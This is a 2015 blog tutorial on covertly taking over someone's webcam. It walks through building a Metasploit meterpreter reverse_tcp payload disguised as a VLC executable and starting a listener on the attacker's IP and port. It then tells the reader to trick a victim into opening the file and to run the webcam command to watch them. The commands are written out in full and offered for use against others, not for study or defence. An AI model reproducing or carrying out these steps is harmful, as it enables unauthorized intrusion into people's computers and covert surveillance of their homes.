Wednesday, November 18, 2015

== HACK ANY WEB CAMERA OF REMOTE COMPUTER ==

HOW TO HACK ANY WEB CAMERA OF REMOTE COMPUTER






Hello guys in this tutorial you will learn how to hack any Web Cam of remote Computer. As I think many of the user definitely wants to know about how to hack of the WebCam of remote Computer. So my friends in tutorial you definitely find your ans. In this tutorial what I can do I am using a backtrack as an attacker System to create a Payload and send this Payload to the Victim which is Windows7. Now it demo time how these work..


Note :- This Payload works on windows 2000, XP, Vista, Win 7.

Step 1 :- First open terminal in linux and write the following codes to create a Payload.

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.128 R | msfencode -t exe -c 15 >vlc.rxe

By Performing above Step our Payload is successfully encoded and creates in root directory of backtrack.

Step 2 :- Now we used to open a msfconsole for that go to..

Applications – BackTrack – Exploitation Tools – Network Exploitation Tools – Metasploit Framework –

msfconsole

Step 3 :- Now the msfconsole is open in front of you then at that console we set some basic command.

use exploit/multi/handler

set PAYLOAD windows/meterpreter/reverse_tcp

(here “PAYLOAD” means the code or exploit which is actually runs on the victim machine after exploitation is successfully works and “windows” is represent the victim machine and “meterpreter” is used to open the meterpreter session of windows and “reverse_tcp” is use to connect back to attacker machine to victim machine)

set LHOST 192.168.1.128 (this is a ip address of attacker machine i.e the

ip of my backtrack, you can use ifconfig command to view the ip address of backtrack)

set LPORT 4444 (this is a local port where the victim system connect back to the attacker system)

exploit



Step 4 :- In  our exploit is running successfully and wait for the victim. Now we copy that exploit and send to the victim and request him/her to click/open the exploit.



After clicking the vlc.exe exploit on victim system, then we successfully got a meterpreter sessions opened.

Now its time to do hack a webcam of remote system by using webcam command.


Step 5 :- run webcam

After running above command the webcam of the victim machine is now start to run, to view the webcam snap of

victim go to root directory of backtrack and open a webcam.htm file and continue press refresh button or F5.





Follow Me On Facebook Danuka Deshan

Author:

0 comments: